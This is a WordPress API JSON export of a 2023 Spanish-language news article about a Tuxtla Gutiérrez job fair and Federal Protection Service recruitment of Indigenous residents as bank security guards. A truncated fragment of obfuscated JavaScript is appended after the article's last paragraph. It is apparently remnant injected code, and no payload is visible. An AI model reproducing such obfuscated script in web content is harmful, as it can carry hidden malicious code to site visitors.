{"id":10565,"date":"2023-06-15T04:06:57","date_gmt":"2023-06-15T04:06:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10565"},"modified":"2023-06-15T04:06:58","modified_gmt":"2023-06-15T04:06:58","slug":"reclutan-a-pobladores-de-los-pueblos-originarios-para-el-servicio-de-proteccion-federal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10565","title":{"rendered":"Reclutan a pobladores de los pueblos originarios para el Servicio de Protecci\u00f3n Federal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686801947617-1024x768.jpg\" alt=\"\" class=\"wp-image-10566\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686801947617-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686801947617-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686801947617-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686801947617.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>14 de junio del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles 14 de junio se llev\u00f3 a cabo la 7a Feria del Empleo Incluyente impulsada por la Secretar\u00eda de Econom\u00eda de Tuxtla Guti\u00e9rrez, en la Calzada de las Personas Ilustres, donde se ofertaron m\u00e1s de 700 vacantes.<\/p>\n\n\n\n<p>Adem\u00e1s de ello, tambi\u00e9n se ofertan espacios laborales para el Servicio de Protecci\u00f3n Federal, a toda la poblaci\u00f3n en este lugar y se continuar\u00e1 con el reclutamiento a personas de los pueblos originarios que deseen laborar en esta fuerza de seguridad.<\/p>\n\n\n\n<p>En esta feria participaron m\u00e1s de 35 empresas, y tambi\u00e9n 21 vacantes inclusivas, es decir, para personas con alguna discapacidad, ofertadas por m\u00e1s de 11 empresas.<\/p>\n\n\n\n<p>Un n\u00famero importante considerando lo complicado es que se generen este tipo de ofertas laborales.<\/p>\n\n\n\n<p>Cabe destacar que, los of\u00edciales del SPF informaron que, estas vacantes son para personal de seguridad de las sucursales del Banco Bienestar, el resto ser\u00e1 del sector privado, de empresas de otros estados que vienen a reclutar personal a Chiapas.<\/p>\n\n\n\n<p>El Sistema de Seguridad Federal esta reclutando al personal de seguridad que cuidar\u00e1n las 86 sucursales del Banco del Bienestar que habr\u00e1n en la entidad. La idea es que los trabajadores sean originarios de los municipios donde se instalar\u00e1n las nuevas sucursales.<\/p>\n\n\n\n<p>De acuerdo con el polic\u00eda del Servicio de Protecci\u00f3n Federal Daniel Alejandro Quechule\u00f1o, encargado del reclutamiento en Chiapas inform\u00f3 que, en esta ocasi\u00f3n se est\u00e1 promoviendo estas vacantes para los pueblos ind\u00edgenas.<\/p>\n\n\n\n<p>\u201cEn caso de no ser de estos pueblos, tendr\u00eda que postular para viajar a otro estado, son plazas para un trabajo de 24&#215;24, con un salario neto de 11, 164.30 pesos mensuales, e incluye el seguro de vida, seguro por riesgo, seguro de gastos m\u00e9dicos mayores, dos periodos de vacaciones por a\u00f1o, licencia de maternidad o paternidad, prima vacacional, vales de fin de a\u00f1o, entre otros beneficios\u201d, detall\u00f3.<\/p>\n\n\n\n<p>Expuso que, a los interesados, pueden acudir a los reclutamientos, desde este 15 y 16 de junio que se llevar\u00e1 a cabo en la Avenida Central Poniente, 554 del Edificio Valanci, de 9 de la ma\u00f1ana a las 14 horas.<\/p>\n\n\n\n<p>El d\u00eda lunes se llevar\u00e1 a cabo en la ciudad de San Crist\u00f3bal de Las Casas, en la plaza central.<\/p>\n\n\n\n<p>\u201cEsta es una buena oportunidad, se le est\u00e1 dando prioridad a los habitantes de los pueblos originarios, en caso de que no queden en su mismo municipio puede ser en un lugar cercano\u201d, expres\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 14 de junio del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles 14 de junio se llev\u00f3 a cabo la 7a Feria del Empleo Incluyente impulsada por la Secretar\u00eda de Econom\u00eda de Tuxtla Guti\u00e9rrez, en la Calzada de las Personas Ilustres, donde se ofertaron m\u00e1s de 700 vacantes. Adem\u00e1s de ello, tambi\u00e9n se ofertan espacios laborales &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10566,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10565","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10565","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10565"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10565\/revisions"}],"predecessor-version":[{"id":10567,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10565\/revisions\/10567"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10566"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}